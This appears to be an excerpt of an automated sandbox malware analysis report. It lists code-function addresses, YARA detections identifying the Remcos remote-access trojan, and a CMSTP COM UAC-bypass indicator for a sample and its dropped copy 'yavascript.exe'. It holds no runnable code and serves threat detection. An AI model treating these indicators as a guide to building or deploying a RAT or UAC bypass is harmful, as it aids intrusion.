Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,	20_2_004167B4
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F96A20 ExitWindowsEx,LoadLibraryA,GetProcAddress,	20_2_01F96A20

Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0043E0CC	0_2_0043E0CC
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0041F0FA	0_2_0041F0FA
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00454159	0_2_00454159
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00438168	0_2_00438168
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_004461F0	0_2_004461F0
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0043E2FB	0_2_0043E2FB
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0045332B	0_2_0045332B
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0042739D	0_2_0042739D
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_004374E6	0_2_004374E6
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0043E558	0_2_0043E558
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00438770	0_2_00438770
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_004378FE	0_2_004378FE
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00433946	0_2_00433946
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0044D9C9	0_2_0044D9C9
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00427A46	0_2_00427A46
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0041DB62	0_2_0041DB62
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00427BAF	0_2_00427BAF
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00437D33	0_2_00437D33
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00435E5E	0_2_00435E5E
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00426E0E	0_2_00426E0E
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0043DE9D	0_2_0043DE9D
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00413FCA	0_2_00413FCA
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_00436FEA	0_2_00436FEA
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02167251	0_2_02167251
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0216E333	0_2_0216E333
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0214F361	0_2_0214F361
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02157075	0_2_02157075
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0216E104	0_2_0216E104
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02157604	0_2_02157604
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0216E7BF	0_2_0216E7BF
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02176457	0_2_02176457
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0216E562	0_2_0216E562
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02183592	0_2_02183592
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02163BAD	0_2_02163BAD
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_021689D7	0_2_021689D7
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02157E16	0_2_02157E16
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_02157CAD	0_2_02157CAD
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: 0_2_0214DDC9	0_2_0214DDC9
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0043E0CC	15_2_0043E0CC
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0041F0FA	15_2_0041F0FA
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00454159	15_2_00454159
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00438168	15_2_00438168
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_004461F0	15_2_004461F0
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0043E2FB	15_2_0043E2FB
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0045332B	15_2_0045332B
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0042739D	15_2_0042739D
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_004374E6	15_2_004374E6
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0043E558	15_2_0043E558
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00438770	15_2_00438770
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_004378FE	15_2_004378FE
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00433946	15_2_00433946
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0044D9C9	15_2_0044D9C9
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00427A46	15_2_00427A46
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0041DB62	15_2_0041DB62
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00427BAF	15_2_00427BAF
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00437D33	15_2_00437D33
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00435E5E	15_2_00435E5E
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00426E0E	15_2_00426E0E
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0043DE9D	15_2_0043DE9D
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00413FCA	15_2_00413FCA
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00436FEA	15_2_00436FEA
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00757075	15_2_00757075
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0076E104	15_2_0076E104
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00767251	15_2_00767251
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0074F361	15_2_0074F361
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0076E333	15_2_0076E333
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00776457	15_2_00776457
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0076E562	15_2_0076E562
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00783592	15_2_00783592
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00757604	15_2_00757604
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0076E7BF	15_2_0076E7BF
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_007689D7	15_2_007689D7
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00763BAD	15_2_00763BAD
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00757CAD	15_2_00757CAD
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_0074DDC9	15_2_0074DDC9
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 15_2_00757E16	15_2_00757E16
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0043E0CC	20_2_0043E0CC
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0041F0FA	20_2_0041F0FA
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00454159	20_2_00454159
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00438168	20_2_00438168
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_004461F0	20_2_004461F0
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0043E2FB	20_2_0043E2FB
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0045332B	20_2_0045332B
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0042739D	20_2_0042739D
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_004374E6	20_2_004374E6
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0043E558	20_2_0043E558
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00438770	20_2_00438770
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_004378FE	20_2_004378FE
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00433946	20_2_00433946
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0044D9C9	20_2_0044D9C9
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00427A46	20_2_00427A46
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0041DB62	20_2_0041DB62
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00427BAF	20_2_00427BAF
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00437D33	20_2_00437D33
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00435E5E	20_2_00435E5E
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00426E0E	20_2_00426E0E
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_0043DE9D	20_2_0043DE9D
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00413FCA	20_2_00413FCA
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_00436FEA	20_2_00436FEA
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FBE104	20_2_01FBE104
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FA7075	20_2_01FA7075
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F9F361	20_2_01F9F361
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FBE333	20_2_01FBE333
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FB7251	20_2_01FB7251
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FD3592	20_2_01FD3592
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FBE562	20_2_01FBE562
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FC6457	20_2_01FC6457
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FBE7BF	20_2_01FBE7BF
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FA7604	20_2_01FA7604
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FB89D7	20_2_01FB89D7
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FB3BAD	20_2_01FB3BAD
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01F9DDC9	20_2_01F9DDC9
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FA7CAD	20_2_01FA7CAD
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: 20_2_01FA7E16	20_2_01FA7E16

Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 00434E10 appears 108 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 0040417E appears 46 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 01FB49D7 appears 41 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 007649D7 appears 41 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 00411F67 appears 32 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 00402213 appears 38 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 004052FD appears 32 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 00401FAB appears 39 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 01FB5077 appears 45 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 00402093 appears 100 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 00434770 appears 82 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 004020DF appears 40 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 004484CA appears 36 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 004046F7 appears 34 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 00765077 appears 45 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 00401E65 appears 69 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 00457A28 appears 34 times
Source: C:\Users\user\AppData\Roaming\yavascript.exe	Code function: String function: 004458D0 appears 56 times
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: String function: 021649D7 appears 41 times
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: String function: 00434E10 appears 54 times
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: String function: 00402093 appears 50 times
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: String function: 00434770 appears 41 times
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: String function: 00401E65 appears 35 times
Source: C:\Users\user\Desktop\ltlbVjClX9.exe	Code function: String function: 02165077 appears 45 times

Source: C:\Users\user\Desktop\ltlbVjClX9.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6464 -s 964

Source: ltlbVjClX9.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.ltlbVjClX9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.ltlbVjClX9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.ltlbVjClX9.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.3.yavascript.exe.2180000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.3.yavascript.exe.2180000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.3.yavascript.exe.2180000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 26.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 26.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.yavascript.exe.730e67.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.3.yavascript.exe.2000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.3.yavascript.exe.2000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.yavascript.exe.2000000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.2.ltlbVjClX9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0.2.ltlbVjClX9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0.2.ltlbVjClX9.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.2.yavascript.exe.1f80e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 26.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.yavascript.exe.1f80e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.2.yavascript.exe.1f80e67.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.yavascript.exe.730e67.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 20.3.yavascript.exe.2000000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 20.3.yavascript.exe.2000000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 20.3.yavascript.exe.2000000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 26.3.yavascript.exe.21c0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
